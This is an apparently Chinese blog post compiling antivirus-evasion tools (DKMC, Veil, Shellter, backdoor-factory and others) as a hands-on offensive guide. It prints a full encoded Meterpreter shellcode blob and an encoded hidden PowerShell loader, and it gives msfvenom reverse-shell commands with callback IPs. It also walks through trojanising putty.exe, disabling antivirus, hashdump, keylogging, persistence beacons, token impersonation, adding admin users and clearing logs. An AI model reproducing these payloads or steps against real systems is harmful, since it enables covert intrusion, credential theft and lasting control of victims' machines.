• 免杀工具汇总


    今天整理以前的笔记,把这部分工具整理了一下,虽然没有白利用稳,但这些工具也能在一定程度起到一定的免杀作用。

    DKMC

    项目地址:
     
    可以创建一个 outputs 文件夹 存放 shellcode
    启动
    python dkmc.py
    操作顺序:
    Sc :是将 msf 生成的 raw 文件转换位 shellcode 代码
    Gen :是将其 msf 的 shellcode 注入到 BMP 图片中
    Ps :将其 BMP 的图片转换为 powershell 代码
    Web :将其开启 web 功能
     
    第一步,先生成原始的 shellcode
    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.88.174 lport=7777 -e x86/shikata_ga_nai -i 16 -f raw -o /root/DKMC/dk
    第二步,生成 shellcode ,将生成的 shellcode 保存到文本里,exit 退出
    xdbxc3xb8xa4x85xc1x7dxd9x74x24xf4x5ex31xc9xb1xbbx83xeexfcx31x46x15x03x46x15x46x70x7fxa8x6bx01xd8x8exb0x2fxacx14xc2x8fx64x9cx9bx84xf4xf1x27xd5x8dx1cxd4x61x63xfdxfaxbax23xe1xb9xc7xebx94xb7x28x3cxd4xb1x88x12x39x15xcax37xcbxd2x6ax10xf9x60x8dx08xaax69xb2x5ex4bx1fx16x2cx74x50xb2xd7x88xe7x21x13xd6x29x40x06x24xfcx02x4cx8ax77x1fx5fxf5xedx47xb7x38x63xafx2ex6exbex22xedxa5xf8x61x8bx17x19xb7x46x63x28x96x73x70x94x93x44xcfxe5x92x68x34x2fx1fx61xaaxa2x87x79x29x9bxe3x59x3ax62xe1xf2x0fx3dxfcx5fxecxc5xeexe2xc1x56x38x1bx76x98x5exd4x02x92x81xd4x25xf0x46x68x67x2axc6x9dxf7x9bxf8x0cx35xcaxbbx48x70xe1x26x06xcex46x48x6dx34x99x1exa3x52x70x4dx41xa3x68x8fx4ax60x27xb5x21x74x76x82xf3x7dx58x5dxd6x07x6ax86xc2xaax72xd2x60xeex7fxadx3fx7dx3fxd1x7ax39xcdx5bx04xc2xc7x1cx28xbex89x5cxa9x9fx51xf7x7dxeax26x87x33x3dx96xb2x20x7fx30x92x72xc7x0cx03x5dxbaxebxd2x09x58xfbxfdxdexe1xf3xf3xa2x62xa5xeex2axebxcdx38xe9xb9x2dx51x98x79xaex85x25x1bxd9x08x95x86xb9xb6x31x7bx87xf5x56x8axd7x6fxddx79xb7x37xb0x27xebxdexdcx9bxaax59xccx0ex3fx9dxe6xc6x17x51x5ax87x4cxb9x43xa3xb2x55x83x0bx8axdbxa9xf8xeex3exf3xd3x5dxb4xf8x96x68x9fx1cx92xadx59x2cx56x0axeex5axf7x74x98x23xcexa1x4fxadx06xa4xddxa4xa8x18x45xe9x62x32x9dx14x6cxb7x4dx5ax0dx81xe2x3exbcx27x05xfcx60x25xc9xb9x96x57xccxefxa3x27x30x31xa8x5bxdax0fx13x28x6fx4ex69x4ax5cx99x31xd1xcfxa6x27x8fxd6xd0xc2xe4xf6x36xb8xefx63x81xf4xedxacxe3xa0xbax63x94x73x18xcfx9dx6cxe4x9dx75x2bxb2xeaxe2xb7xfex15x95x18x1fx25xfax66x50x2ex70xd8xf2x31xdfx93xe6xe0xfdx04x4fxc6xc9x4axb6xecx69x2axa5x13x9dx54x5ex5ax99xc0x23x49x31x96x6ex5fx87xa0x6dx6cx02x0fxa5x61xb7x8cx2fx94x6fx53x4excfx53x81xcdx87xa9x1axa5xe2x6exfcx0bxb7x01x4cxb1xdfx72x51xbexb2x39x70xe4xcfx12x45x79xc1x5exb4xa3xfax5dxc5x96xe8xacx28x5axd8xefx0ax12x4ex8fxabxb2x65x64x3dxa3xe5x61xf9x9fxe0x97x66x0bx44x9exc6xeex85xb6x5excex86xd7x52xc9x63x57x88x9dxddx07x37x6bxfbxb6x97xa3x8fx24xeax48xc5x6fxe9x93x3cx56xf9xd9x3cx90x59x7dx8exa4x47xc2x58xf5xa8xe4xdex82x0cx63xd2xebxbbxd0xe6xf0x82x2bx1exd0xefxb0x61xdbx39x01x61x32x31x1ax47x32xf1x72x68x20x7bxcdx1ax71x60xa5x32xd1x7bxccxe2xd3xa3xa0x5ax7dx44x1axecx48xc6x2bxb0x66x1axb1x84x59x62x88x49xa6x94xfcxc3xd2xebx7ax21xc6xacx01xb5xe7x65xe9xb2x12x31xf0xddxfex61x4axcaxebx03x90x3fxf4xdax88x51xbexe6x4dx3ex2dxf5x9fxb3xbcx06x92xbex8axc0xcax76x33x01x11x73xf8x1dx21xabx44xc2xfcx6ex2fxa6x8fx51xa0x94x63xcex02x69x0bx37xcaxa5x3ex90x3bx9ax10x2fxdbxcex4cxe1xd2xbb
     
    第三步,启动 gen 功能,将 shellcode 注入到图片中,设备图片位置和 shellcode 参数,
    output 文件夹下生成一个注入 shellcode 图片,exit 退出到菜单界面
     
    第四步,将图片转换成 powershell 文件,保存成为 dk.ps1 格式
    run
    powershell.exe -nop -w hidden -enc JABoAGsAYwByAGEAbABsAEQAZAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBIADQAcwBJAEMATABPADgAUAAxADAAQwAvAHoARQAxAE4AagBRADAATgBUAGcAeABOAGoATQB1AE8AVABVACEAdABWAFoAdABiAHgAbwA1AEUAUAA0AGUASwBmAC8AQgBxAGwAYgBhAFgAVwBuAFoAawBKACEAMgBFAFYASwBsAEUAUABMAFMAWAAhAHIAbABJACEAbAAzAFIAMQBGAGwAZABnAGQAdwA2AHIAVQBYADIANQB1AEUATgB2AG4AdgBOADEANQAyAGcAUwBpADAAVABYAFcANgA1AFEATgArAG0AYgBGAG4AbgBuAG4AOAAyAEUANwBTADcANAAvAEkAZQAzAEwAawBiAG0AKwBOAE0AeABFAFoASgBnAFgAaABZAGsAYQArAGIAMgArAFIANAB1AHQAUQBSAFIAUABpAE8AWABkAFUAZgBVAGwAawBuAEgARQBJAFMATgA1AEoAbABZAHcAZwB6AGgAVAA0AEsAMgBNAEgAegBKADkAdABYAE4AIQBiAE4ATgBMADAAUgBDAGEAVQBpAFcARwA5ADMAcwB5AFUAIQBtAEUAVwAvAGYAIQBjAFQARQBOAHIAUwBFAGEAYwBnAGYAWgA4ADgAawBqADYAVQAxAEIAUQArAFQAUwA2AGgAYwBpAFEANwA4AFQANQBFAHAANQB6AE8AYQBLADgATQBKAHMAMwBhAFQAUQBGAFUAbQBtAEkAMgBNADUAOQBsAEIARwAxAGcAWQBhADkAbABEAFAAagB1AFoAOAAvAHUALwA2AGcAcwBqAHMATQBUADIAYwBaADUAZABwAHoAZQAzAE4AdABJACEAbABqAHoAbAAyAGYAUABQAGwAMgB3ADYAdAA1AEMAcAA3AGIAWQBwAEcAUwBXAG8ANQBOADIARwBlAGkAdABoAGQAZQBDADAAMwBIADAATQBiAFYANwBxACEARgBaAGkAcABqADcAVwBJAHkAcQAzAFEAVQBtAEUAeQBKAFIAVgBaADIAbQBZAFcAUgA1ADIASwB6AGcAOQBrADMANABsAGkAQgBSAHAALwB3AFEAdAB6AEoAcgArACEANQBJAHUATQA4AEkARQBmAGUAbwBJAGkAaABtAHcAbgBEAEUAcwBCADUAIQAwAHEAbQBQAFYAQgAzAEwAIQBJAGQAZgBxACEAaQA1AHQAQwBGADgAZABCAHIAdwAzADIAWgArAG0AdQBkAHYASABVAG4AdABPAG8AWQA1AFEAZABZAG8AZwAxAGgAdAB2AEsASwBMAFQAeABkAC8AMgBXAGcAYQAyAFgAMQA4AFgAdABSAFcAbwBUAGoAeQBTAEsAeQBaAE0AZgBrAE0AdAAzACEAagB0AFYAIQArAFEAMwB5AEcAYwAhAE0AdgBJADcAVQBMAFAAZAA5AFQANgBvAEIAYQBXAEUAcwAxAEUAZwAxAHgANgA1AHoAcABUAEwAdwBoADIAUgBnADYAegBNAFkARABvAGwAegBPAFYAYgBaAGoAUQB4AGUAdQA5ADUAdQA2AFkAeQB1AHIAZgBQAGIATAB2ADkANwBsAGgATgA2AGMAQwBOAFoAUABGAHkAdAA4AHEAeQBxAHoAdQBUADYANABWAHMAMwB1ADQAbQBzADQAWQA5ADUAZQBnAEoAagBKAHUAQgBrAEwAbQBqAEMAbwBwAEsASwAzAHEAWgA2AHcAWgBoAEQAagBrADUAWQBtAHIAVQB4AFYATQA4AHQASgBpACEAKwAhAFEANABUAGEAbQB3AEYAIQBqAEoANAA2AFgAYQBhAE0ATABQADAAUABjADQAWQBqADAARQAxAEkAcQB5ADUAeABxAGkAUQBEAHYANwB6AFkAQgBaAEYAOQBkAHcATAAwAFkASQBFAGsAVgB6ADAAWABTAHoAZQBHACEAOAAhAGwATgBZAEYANgBlAGYAbAA3AHIAYQBQAFIAbQA2AFQAVQA2ADAARAAwAHMAbgB3AEIARQBZAEIANgBRAEgAbABFACEAZQBrAEkAVABRAHIAcABoAHEAWgBrAFgAbgBUAFgAWQBYAGIAeQByAGgAaABFAGQAVwBtAFgARwA3AG8AYgA0AEMAMAAyAEwAbwBwAGgAVABZAHEAaQA3AEQATwBDAE0ATgBWAEwANABXAEkAVQBXADUAUgBDAGMAZwBIAEYAcwBQAHgAdgBNAGMAbQBaAFEAagB1AFIAawB5AGEAbABIAE0AbQBKAHIAagBTAEgAZABZAEUAUgB5AHcAVwBQAFcAUABaAG8AegBEAGEAZwBpAGwAKwAyACEATgB6AGsAYQBRAGMARQByAFQASwBkAGUARwBNADAAdwBtAHEAUQBIAEcASwBjAHMATABSAEMAYwBUAHUAVAA4AEkAdABEADgAegBpAGQARgBpAE0AUwBuAEQAVwBnAHMAWABDADkANwBnADAAIQBiAGwAaAB5AHEARABTAFcATAB5AFgAbgBQAHUAUAAhAFoAVgBDAHMANAB5AHIAcQBhAEMAbwBtAEwAYwA0AGcAaQBWAEMAYgBVAEQAMQBnAGwARQBYAFoAaABsAG8AZwA1AEIAZwBCAGgAUgBMAGcAMgBNAG8AUwBRADkAegA2AHgAbABiAHcASgAhAEoAbAB0ADkAcgBiAHEAdQBaAFgARgBCAFgAdgBtAHMAdQB1AE4ASAB4ADMATgBpAHoANgBFAFQAOQBzAHoASAByAEgARgBzADEAZgA4AG4ANQBJAG8AdwBtAGEAcgBnAHcAUwBEAGgANQBMADcAaQBrADgAUQBrADEAMQBIAHMAegBOAFMAYQB0ADcAKwB6AHMANwBoADIARQBWAGYAegB0ADEAZwArAHIAaAA5AFUAZABtAFoAawAwAE0ANQBYAGQAdAArAC8AMgA5ADkAOABlADEAIQA3AGUAaABhAE0AawBmAFoATwBmAFQARwBjACsANgAvAEMAcgAwAFgAUQB0ADQAQgArAEoAWQBJAHMAcQBQAGEAVQBjAGcAMABkADEASwA2AGwANABKAHQAVgBaAEkAVgAhAGQAeQBhAHkASAA1ADkAbAByADcAQwBzAG8AIQBSAHkAVgBIAHUAKwBDAHMAbQB3AE4AegBtAFYAawA1AGQASQBxAEcAUwByADEAUQBqACsASAB5AE0ARgByAGIATgBiADIATgByAFoAOABzAGoAVAAwAFYAeQBwAGEARAB0AFgAcgAvADIAQwBNAFMASQBFAEMAcwB2ACEAagBpAEkAbQBaAEIAdABXAEgAVwByAFcASwBrAGwAZAA5ADIASwAvADYAcQB4AEwAKwBPAHIAVwBtAFQATwBkAGUAdQBWAHAAZwBWAGIATgBFAGEARwAwAFQAbgBtACsAeQB3AEUAOQAzAGUANQBmAC8ASwAzAGcARgBIADYAZgA0AEYALwA4AEMAdgBOAFgAWQBUADIAWgBmAEIAVwBnADEAVwBLAGIAOQBZAHUAYgA1AHcARwArAGgAKwA3AHUANQA5AHkAawB6AGEATgBoAEQATgBlAEsAdwBPACEAWQBiAEkAUwBpAG8AcwBuAGIATAAyAHIASQBnAEMAOABiAEYAWgA5ADgANgBuAC8AIQBJAHQAUABIAHkAMwBkADUAeQBqADIAegBwAEwAcwBaAGsATABXADMATgB2AHUARgBEAEIAMgBiAGsAMABGACsALwBaAGIAVwBoAHkAbABSAHUANQBRAGgAZgBSADYAbQA5AEIAegAyAG4ATAAyACsAZwBjADUAMwA0ADUATwBMADAATAAxAEwAMgB5AEIATwBwAFkAUAA0AE4AWABkAHYARAA1ADUASwBhAFoARgBhAEQAaQBKAE8ALwA4AGgANwBKAFAAZQBhAFIATAAvAEoASQB1AGgAIQBCAFAAbgBvAHEAZgA4AGgAUgByAGkANgAhADEAOABiADYAaAB2AG0AaQAxAGkAMgBmAC8AUgBkAGIAcQBvAE0AeQBKAHcAbwAhACEAIQA9AD0AIgAuAFIAZQBwAGwAYQBjAGUAKAAiACEAIgAsACAAIgBBACIAKQApACkAOwAgACQAZwBKAGQAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAaABrAGMAcgBhAGwAbABEAGQALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwAgAFsAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAF0AOgA6AEMAcgBlAGEAdABlACgAJABnAEoAZAApAC4ASQBuAHYAbwBrAGUAKAApAAoA
     
    第五步,开启 web 功能,直接运行即可
    >>> web (web)>>> set port 8080 [+] port value is set. (web)>>> run [+] Starting web server on port 8080 127.0.0.1 – – “GET /output-1496175261.bmp HTTP/1.1” 200 –
     
    免杀测试
    过特征检查,不过行为
     
     
     
     
    msf shellcode 生成器和编码器-venom
    项目地址:
     
    使用:
    shellcode 格式 都是以图形化 的方式呈现的,比较直观,悬着对应数字就行了。
    输入 反弹 地址 lhost 和 端口 lport
     
    选择 反弹 方式
    输入 文件名
    shellcode 生成之后 会自动 打开侦听器
     
    生成的shellcode 在 /venom/output/ 目录下面
    过特征,不过行为,可以实现短时间免杀,需要及时迁移进程
     
     
    Green hat pro免杀工具使用
     
    项目地址:https://github.com/Green-m/green-hat-suite
     
    开始安装:
    kali 上 安装:
    gem install os apt-get install mingw-w64 apt-get install wine
     
    windows上安装:
    下载并install.ps1使用administartor权限运行。
    安装将持续几个小时,请耐心等待。
     
    使用
    cd green-hat-suite/
    ruby greenhat.rb 启动
     
    短时间内天擎免杀,需要及时迁移进程避免被杀。
     
     
    TheFatRat 免杀 工具
    便捷化payload生成:
     
    安装完成后使用fatrat命令启动
    完全傻瓜式操作
    设置文件名的时候无需加后缀!
     
     
     
    avet 免杀 工具使用
     
    进入 avet 文件夹内,进入 build 文件夹下,修改 global_connect_config.sh 文件,更改 kali IP 地址,端口 号为 7777,
    运行: ./avet_fabric.py
     
     
    免杀工具—Veil-Evasion
    项目地址:https://github.com/Veil-Framework/Veil-Evasion Veil-Evasion是与Metasploit生成相兼容的Payload的一款辅助框架,并可以绕过大多 数的杀软。
    git clone https://github.com/Veil-Framework/VeilEvasion.git
    /setup.sh 安装
     
    安装veil:
    root@kali:~# apt-get update && apt-get install veil
    启动veil:
    root@kali:~# veil
    Veil>: list 查看列表
    [*] Available Tools:
    1) Evasion
    2) Ordnance
    Veil>: use 1
    Veil/Evasion>: list 查看具体的payload
     
    Veil/Evasion>: use 9 使用序号为9的payload
    [cs/meterpreter/rev_http>>]: options 查看需要配置的选项
    set LHOST 192.168.199.165
    [cs/meterpreter/rev_http>>]: generate 使用generate命令生成载荷文件
    [>] Please enter the base name for output files (default is payload): backup 指定一个文件名backup
    /var/lib/veil/output/compiled/backup.exe 生成的文件位置
     
    接下来使用msf创建远程处理器
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.199.165
    exploit
     
    meterpreter> background 后台运行会话
    sessions 查看会话详情
    search bypassuac
    use exploit/windows/local/bypassuac 使用本地提权模块
    set SESSION 1
    exploit
    meterpreter>getuid 查看用户信息
    meterpreter>getsystem 获取系统权限
    run post/windows/gather/hashdump 获取hashdump
     
    veil 启动veil
    Main Menu
     
    2 tools loaded 两个工具被加载
     
    Available Tools: 可利用的工具
     
    1) Evasion 规避免杀
    2) Ordnance 工具箱
     
    Available Commands:
     
    exit Completely exit Veil 退出veil
    info Information on a specific tool 查看工具详情
    list List available tools 列出可用的工具
    options Show Veil configuration 显示veil配置信息
    update Update Veil 更新
    use Use a specific tool 使用一个具体的工具
     
    use 使用模块 1·
    list 查看该模式下可用的payload
    使用payload:use c/meterpreter/rev_tcp 或者use 7
    设置反弹连接的ip以及端口
    options 查看配置信息
    generate 生成payload
    输入要生成的文件名是veilshell.exe
    veil 会同时生成多种场景的payload
    [*] Language: c
    [*] Payload Module: c/meterpreter/rev_tcp
    [*] Executable written to: /var/lib/veil/output/compiled/veilshell.exe.exe 生成的可执行程序
    [*] Source code written to: /var/lib/veil/output/source/veilshell.exe.c 生成的.c源文件
    [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/veilshell.exe.rc metasploit源文件
     
    对于生成的.c源文件可以进行二次免杀处理,比如使用shellster 将shellcode注入可执行程序中等等。
     
     
     
    shellter免杀
    Kali Linux下安装shellter:
    apt-get update
    apt-get install shellter
     
    启动shellter
    (需要wine环境apt-get install wine32)
     
    Kali 64位运行shellter会出错,原因是shellter只支持32位系统
    kali linux 64位上安装32位的wine
    在终端下输入
    dpkg –add-architecture i386
    apt-get update
    apt-get install wine32
    安装会有一个error提示 提示使用apt-get update来修复,那就继续输入apt-get update
    apt-get install wine32
    OK
     
    这里我从百度下载一个putyy来进行测试,把它放在/root/目录下
    安装好环境后启动shellter
    root@kali:~# shelter
    进入shellter控制台
    这里有三个选项
    A auto自动
    M 高级设置
    H help
    这里我们使用A,PE Target输入exe程序的绝对路径
     
    然后需要等待几分钟等待描绘完成
     
    此处提示:是否进行注入,我们选择y
     
    这里提示使用此处列表提供的payload还是使用自己设置,我们选择使用L
    L list
    C customs
    H help
     
    使用List索引1,即meterpreter_reverse_tcp(tcp反弹)
     
     
    设置shellcode回连的IP以及端口,也就是我kali的ip和接收的端口8888
     
    稍等片刻即可生成带有shellcode的putty.exe程序。
     
    然后我们验证免杀效果(这里使用的是天擎的云查杀功能对该文件进行扫描无异常)
    但是当我们点击程序进行运行的时候会报毒(这里猜测是天擎发现了程需主动回连行为,也就是基于行为的查杀)
    然后我们打开msf设置攻击载荷,设置msf监听
    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set LHOST 192.168.199.165(设置本地监听地址)
    set LPORT 8888(设置本地监听端口)
    exploit
     
     
    此时我们运行包含shellcode的可执行程序,并开始攻击
     
    可以看到已经接收到了我本机192.168.199.205的会话,不过后续连接被天擎阻断了,
    过了几分钟弹出病毒提示。
     
    论安装杀软的必要性
     
    成功拿到shell
     
     
    使用migrate进行进程注入,以保证对目标机器的持续控制,
    只要tasklist进程不中断,meterpreter就不会断
     
    监听键盘输入记录,或自动将结果保存到txt文件中
     
    新开一个终端,切换到/root/.msf4/loot下查看键盘记录信息,完美记录!
    获取用户名以及密码的hash
     
    新开msf使用hash进行登录
     
    OK,登录成功了
     
    抓包并保存为cap文件,可以使用wireshake打开查看
     
    收集系统信息
     
    持久控制,设置后门每50秒外连一次
     
     
    重启服务器,后门开机启动,成功回连我们kali的1111端口,成功拿到shell
     
    针对服务器的持久控制
    首先生成一个shellcode,并将其上传至服务器
    安装服务器后门程序,然后删除shell.exe(相当于在服务器生成了msf服务了)
     
    进行监听设置
     
     
     
    Insanity 免杀
    git clone https://github.com/4w4k3/Insanity-Framework.git
     
    安装依赖
    cd Insanity-Framework
    chmod +x install.sh
    ./install.sh
     
    Cloning:
    git clone https://github.com/4w4k3/Insanity-Framework.git
     
    Running:
    sudo python insanity.py
     
    If you have another version of Python:
    sudo python2.7 insanity.py
     
     
    后门工具—the-backdoor-factory
    原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成 payload,并且在程序执行的时候,jmp到代码段,来触发payload。
    安装
    或者apt-get install backdoor-factory 安装
     
    检测是否支持后门植入
    root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/putty.exe -S
    -f:指定测试程序
    -S:检查该程序是否支持 patch
    在确定其支持patch 后,我们再来查看其是否支持我们指定的 shellcode patch
    测试裂缝空间size 200
    root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/putty.exe -c -l 200
    -c:code cave(代码裂缝)
    -l:代码裂缝大小
    查看可注入的payload
    root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/putty.exe -s show
    插入payload,并生成文件。
    root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.199.165 -P 4444
    -s:选择使用 payload 类型
    -H:选择回连服务器地址
    -P:回连服务器端口
    从返回结果可以看出putty.exe不能导入shellcode,我们使用之前metasploit生成的1111.exe的shell。
    root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/1111.exe -s iat_reverse_tcp_inline_threaded -H 192.168.199.165 -P 4444
    ok,shellcode注入成功,新文件在backdoored目录下
     
    对比原文件与生成文件MD5值
    root@kali:~/the-backdoor-factory# md5sum backdoored/1111.exe /root/1111.exe
    开启本地监听
    msf > use exploit/multi/handler
    msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(multi/handler) > set LHOST 192.168.199.165
    LHOST => 192.168.199.165
    msf exploit(multi/handler) > set LPORT 4444
    LPORT => 4444
    msf exploit(multi/handler) > exploit
    meterpreter持久控制PC机
    进程迁移
    run post/windows/manage/migrate(自动查找稳定的进程并切换)
    关闭杀软
    run killav
    查看目标机所有流量
    run packetrecorder -i 1
    提取系统信息
    run scraper
    截屏、键盘记录、嗅探、获取域
    持久控制
    设置后门每50秒外连一次
    run persistence -X -i 50 -p 1111 -r 192.168.199.165
    run metsvc -A 安装后门
    hashdump导出hash利用hash传送漏洞继续扩大战果。。。
     
    输入shell进入cmd,创建简单的用户,当然实战中最好使用localgroup中已有的用户提升管理权限
    顺便说一下,此处添加用户和将用户加入管理员组操作中使用ad,而没有使用add,主要是为了绕过部分防护软件的策略限制。
    假冒令牌
    假冒令牌攻击中需要使用kerberos协议,kerberos协议是一种网络认证协议,其设计目的是通过秘钥系统为客户机/服务器应用程序提供强大的认证服务。
    使用impersonate_token假冒Administrator进行攻击(注意:用户名前两个反斜杠)
    ok,可以看到假冒用户成功,此时就可以通过提升自己的权限在目标系统中进行任何操作了。
     
    清除踪迹(清除日志)
  • 相关阅读:
    nyoj_518_取球游戏_201404161738
    nyoj_528_找球号(三)_201404152050
    nyoj_68_三点顺序_201404152013
    nyoj_123_士兵杀敌(四)_201404131143
    树状数组
    nyoj_116_士兵杀敌(二)_201404131107
    hdu_1024_糖果大战_201404021640
    hdu_1205_吃糖果_201404021440
    nyoj_278_排队_201403282135
    nyoj_127_星际之门(一)_201403282033
  • 原文地址:https://www.cnblogs.com/micr067/p/12407494.html
Copyright © 2020-2023  润新知